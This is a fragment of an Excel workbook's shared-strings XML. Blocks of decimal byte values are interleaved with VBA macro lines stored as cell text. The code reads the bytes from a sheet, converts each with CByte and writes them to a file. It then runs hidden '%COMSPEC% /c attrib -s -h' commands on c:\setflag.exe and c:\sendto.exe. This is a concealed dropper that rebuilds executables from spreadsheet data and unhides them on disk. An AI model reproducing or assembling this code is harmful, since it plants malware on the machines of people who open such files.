    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 150 